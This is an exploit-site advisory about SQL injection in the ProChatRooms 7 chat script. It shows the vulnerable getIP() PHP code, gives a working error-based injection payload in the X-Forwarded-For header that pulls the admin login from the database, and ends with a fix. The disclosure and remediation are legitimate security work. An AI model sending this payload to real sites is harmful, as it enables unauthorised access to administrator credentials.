ProChatRooms <=~ 7 SQL injection

Download | Vote Up (2) | Vote Down (0) 
# Exploit Title: ProChatRooms <=~ 7  SQL injection
# Date: 01/02/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://prochatrooms.com/
# Version: 7.0 and the lastest version (but I can't write a nice PoC without the code)
# Tested on: Debian


Introduction
============

Prochatrooms is a simple chat script, which cost around 50$.
But price doesn't mean security.


Vulnz
========

There are some XSS, CSRF, but most of them have already been reported. Therefore, I'm going to especially show you an SQL injection.


---------------[functions.php]---------------
<?php
function updateUser()
{
        // update details
        $sql = "UPDATE prochatrooms_users 
                        SET username = '".makeSafe($_SESSION['username'])."', userIP = '".getIP()."', room = '".makeSafe($_SESSION['room'])."', active = '".getTime()."', online = '1', streamID = '".$_SESSION['myStreamID']."'  
                        WHERE username = '".makeSafe($_SESSION['username'])."'";

        mysql_query($sql) 
        or die(mysql_error());
}
?>
---------------[functions.php]---------------

It seems pretty safe, except the getIP(). A short look at getIP confirm that :

---------------[functions.php]---------------
<?php
function getIP()
{
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

        if ($ip == '')
        {
                $ip = $_SERVER['REMOTE_ADDR'];
        }

        return $ip;
}
?>
---------------[functions.php]---------------

We can inject in $_SERVER['HTTP_X_FORWARDED_FOR']; (ModifyHeaders is a nice firefox addon for that).


The PoC is Error-Based, and work on the version 7. 
On the last version (the demo on their website), the vuln is present, but my PoC doesn't work.

Have fun :
X-Forwarded-For=' and (select 1 from (select count(*),concat((SELECT adminLogin FROM prochatrooms_config LIMIT 0,1),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a)-- -


How to Fix ?
============

Just change the getIP function by this one :
<?php
function getIP()
{
        return $_SERVER['REMOTE_ADDR'];

}
?>
X_FORWARDED_FOR is not really useful, unless your reverse proxy set it with the real user ip.
If you haven't a reverse proxy, you gonna have a bad time (ip spoof, or as here, SQL injection).



Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://orgasm.re/

Groucho

Be the first to give feedback !
Please login to comment !